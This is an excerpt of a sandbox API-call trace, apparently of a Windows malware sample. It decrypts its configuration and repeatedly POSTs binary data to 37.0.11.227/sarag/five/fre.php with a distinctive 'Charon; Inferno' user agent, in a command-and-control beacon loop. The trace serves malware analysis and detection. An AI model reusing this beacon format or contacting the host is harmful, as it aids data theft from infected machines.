closesocket (s=0x8ac) returned 0 [0280.252] GetProcessHeap () returned 0x690000 [0280.252] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0280.252] GetProcessHeap () returned 0x690000 [0280.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0280.253] GetProcessHeap () returned 0x690000 [0280.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0280.253] GetProcessHeap () returned 0x690000 [0280.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0280.253] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x166c) returned 0x8ac [0280.256] Sleep (dwMilliseconds=0xea60) [0280.258] GetProcessHeap () returned 0x690000 [0280.258] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0280.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.259] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.369] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0280.381] GetProcessHeap () returned 0x690000 [0280.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0280.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.382] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0280.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.383] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.500] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.500] GetProcessHeap () returned 0x690000 [0280.500] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0280.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.519] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0280.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.520] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0280.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.521] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0280.521] GetProcessHeap () returned 0x690000 [0280.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0280.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.521] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0280.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.524] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0280.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.525] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0280.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.525] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0280.525] GetProcessHeap () returned 0x690000 [0280.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0280.526] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0280.526] GetProcessHeap () returned 0x690000 [0280.526] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0280.526] GetProcessHeap () returned 0x690000 [0280.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0280.527] GetProcessHeap () returned 0x690000 [0280.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0280.527] GetProcessHeap () returned 0x690000 [0280.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0280.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.528] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.544] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0280.555] GetProcessHeap () returned 0x690000 [0280.555] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0280.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.556] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0280.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.557] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.559] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.560] GetProcessHeap () returned 0x690000 [0280.560] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0280.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.562] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0280.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.563] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0280.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.564] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0280.564] GetProcessHeap () returned 0x690000 [0280.564] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0280.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.564] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0280.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.565] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0280.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.566] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0280.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.567] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0280.567] GetProcessHeap () returned 0x690000 [0280.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0280.567] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0280.567] GetProcessHeap () returned 0x690000 [0280.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0280.567] socket (af=2, type=1, protocol=6) returned 0x8b0 [0280.568] connect (s=0x8b0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0280.595] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0280.595] GetProcessHeap () returned 0x690000 [0280.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0280.595] GetProcessHeap () returned 0x690000 [0280.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0280.596] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0280.597] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0280.597] GetProcessHeap () returned 0x690000 [0280.597] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0280.597] GetProcessHeap () returned 0x690000 [0280.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0280.597] GetProcessHeap () returned 0x690000 [0280.597] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0280.597] GetProcessHeap () returned 0x690000 [0280.597] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0280.598] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0280.599] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0280.599] GetProcessHeap () returned 0x690000 [0280.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0280.599] GetProcessHeap () returned 0x690000 [0280.600] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0280.600] send (s=0x8b0, buf=0x6ad508*, len=242, flags=0) returned 242 [0280.600] send (s=0x8b0, buf=0x6aba40*, len=159, flags=0) returned 159 [0280.600] GetProcessHeap () returned 0x690000 [0280.600] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0280.600] recv (in: s=0x8b0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0280.676] GetProcessHeap () returned 0x690000 [0280.677] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0280.677] GetProcessHeap () returned 0x690000 [0280.678] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0280.681] GetProcessHeap () returned 0x690000 [0280.682] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0280.682] GetProcessHeap () returned 0x690000 [0280.682] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0280.682] closesocket (s=0x8b0) returned 0 [0280.683] GetProcessHeap () returned 0x690000 [0280.683] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0280.683] GetProcessHeap () returned 0x690000 [0280.683] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0280.683] GetProcessHeap () returned 0x690000 [0280.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0280.684] GetProcessHeap () returned 0x690000 [0280.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0280.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1670) returned 0x8b0 [0280.687] Sleep (dwMilliseconds=0xea60) [0280.688] GetProcessHeap () returned 0x690000 [0280.688] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0280.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.690] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.697] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0280.706] GetProcessHeap () returned 0x690000 [0280.706] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0280.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.707] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0280.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.708] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.709] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.709] GetProcessHeap () returned 0x690000 [0280.709] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0280.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.710] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0280.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.713] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0280.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.714] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0280.714] GetProcessHeap () returned 0x690000 [0280.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0280.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.715] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0280.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.716] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0280.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.717] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0280.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.721] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0280.721] GetProcessHeap () returned 0x690000 [0280.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0280.721] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0280.721] GetProcessHeap () returned 0x690000 [0280.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0280.722] GetProcessHeap () returned 0x690000 [0280.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0280.724] GetProcessHeap () returned 0x690000 [0280.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0280.724] GetProcessHeap () returned 0x690000 [0280.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0280.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.725] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.729] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0280.734] GetProcessHeap () returned 0x690000 [0280.734] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0280.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.735] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0280.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.736] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.737] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.737] GetProcessHeap () returned 0x690000 [0280.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0280.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.738] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0280.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.739] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0280.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.739] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0280.740] GetProcessHeap () returned 0x690000 [0280.740] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0280.740] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.740] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0280.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.741] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0280.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.742] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0280.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.743] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0280.743] GetProcessHeap () returned 0x690000 [0280.743] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0280.743] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0280.743] GetProcessHeap () returned 0x690000 [0280.743] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0280.743] socket (af=2, type=1, protocol=6) returned 0x8b4 [0280.743] connect (s=0x8b4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0280.769] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0280.769] GetProcessHeap () returned 0x690000 [0280.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0280.769] GetProcessHeap () returned 0x690000 [0280.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0280.770] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0280.771] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0280.771] GetProcessHeap () returned 0x690000 [0280.771] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0280.771] GetProcessHeap () returned 0x690000 [0280.771] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0280.771] GetProcessHeap () returned 0x690000 [0280.771] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0280.771] GetProcessHeap () returned 0x690000 [0280.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0280.772] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0280.774] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0280.774] GetProcessHeap () returned 0x690000 [0280.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0280.774] GetProcessHeap () returned 0x690000 [0280.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0280.774] send (s=0x8b4, buf=0x6ad508*, len=242, flags=0) returned 242 [0280.775] send (s=0x8b4, buf=0x6aba40*, len=159, flags=0) returned 159 [0280.775] GetProcessHeap () returned 0x690000 [0280.775] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0280.775] recv (in: s=0x8b4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0280.848] GetProcessHeap () returned 0x690000 [0280.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0280.849] GetProcessHeap () returned 0x690000 [0280.850] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0280.851] GetProcessHeap () returned 0x690000 [0280.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0280.851] GetProcessHeap () returned 0x690000 [0280.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0280.852] closesocket (s=0x8b4) returned 0 [0280.852] GetProcessHeap () returned 0x690000 [0280.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0280.852] GetProcessHeap () returned 0x690000 [0280.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0280.852] GetProcessHeap () returned 0x690000 [0280.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0280.853] GetProcessHeap () returned 0x690000 [0280.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0280.853] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1674) returned 0x8b4 [0280.855] Sleep (dwMilliseconds=0xea60) [0280.857] GetProcessHeap () returned 0x690000 [0280.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0280.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.858] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: 